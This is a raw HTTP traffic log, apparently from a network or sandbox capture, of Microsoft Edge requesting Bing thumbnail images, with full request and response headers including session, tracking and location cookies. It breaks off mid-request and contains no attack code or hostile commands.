report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 10197
x-check-cacheable: YES
cache-control: public, max-age=1094765
date: Thu, 17 Oct 2024 21:03:47 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199027.9b440c4
GET

https://th.bing.com/th?id=ODL.b055fcc46b8bb02568345ad0c74be294&w=171&h=87&c=10&rs=1&qlt=99&o=6&pid=13.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODL.b055fcc46b8bb02568345ad0c74be294&w=171&h=87&c=10&rs=1&qlt=99&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 10849
x-check-cacheable: YES
cache-control: public, max-age=2300170
date: Thu, 17 Oct 2024 21:03:47 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199027.9b440c8
GET

https://th.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=102&h=102&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=102&h=102&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3148
x-check-cacheable: YES
cache-control: public, max-age=578148
date: Thu, 17 Oct 2024 21:03:47 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199027.9b440c9
GET

https://th.bing.com/th?id=ODLS.6c0fcfba-a7dd-4efb-baa1-9421f0b0dbd6&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.6c0fcfba-a7dd-4efb-baa1-9421f0b0dbd6&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 527
cache-control: public, max-age=1379974
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45427
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.87053338-7d3b-4b8e-98ce-56db9a300a3f&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.87053338-7d3b-4b8e-98ce-56db9a300a3f&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 643
cache-control: public, max-age=1226526
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45428
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 865
x-check-cacheable: YES
cache-control: public, max-age=2592000
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45435
GET

https://th.bing.com/th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1073
cache-control: public, max-age=1294793
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45438
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.bf5004ca-28ef-4f24-b581-5f30431d9014&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.bf5004ca-28ef-4f24-b581-5f30431d9014&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
